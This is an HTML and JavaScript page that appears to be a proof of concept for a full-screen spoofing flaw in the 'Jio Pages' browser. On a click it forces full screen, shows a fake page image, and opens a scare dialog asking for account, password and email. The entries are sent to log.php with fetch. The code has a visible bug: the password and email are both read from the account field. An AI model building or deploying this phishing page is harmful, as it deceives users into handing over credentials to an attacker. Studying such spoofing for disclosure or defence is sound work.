<img id="google" src='xxxamazon.jpeg' height="100%" width="100%" style="display: none;"></img>
<link rel="prerender" href="1.php">
<dialog id="myDialog">
  <h1>Fake Prompt On Google.com Affected Browser Jio Pages Version 2.0.6</h1>
  <p>Your computer may be at risk. Fill out the form below to let us help you</p>
  <form id="f" action="http://google.com" method="get">
    account: <input id="ac" type="text" name="account">
    password: <input id="pw" type="text" name="password">
    email: <input id="em" type="text" name="email">
    <input type="submit" name="submit">
  </form>
</dialog>
<script type="text/javascript">
  addEventListener("click", function() {
    var b = document.createElement("iframe");
    b.hidden='true';
    b.src="1.php"; // 401 page
    document.body.appendChild(b);
    var el = document.documentElement,
      rfs = el.webkitRequestFullScreen;
    rfs.call(el);
    document.getElementById('google').style.display="block";
    setTimeout(function(){
      document.getElementById("myDialog").showModal();
    }, 3000)
  });
  document.getElementById('f').onsubmit = function(){
    var ac = document.getElementById('ac').value;
    var pw = document.getElementById('ac').value;
    var em = document.getElementById('ac').value;
    key = ac + " | " + pw + ' | ' + em
    fetch('log.php?a='+key); //log your input
  }
</script>
<style type="text/css">
  #myDialog{
    top:400px;
  }
</style>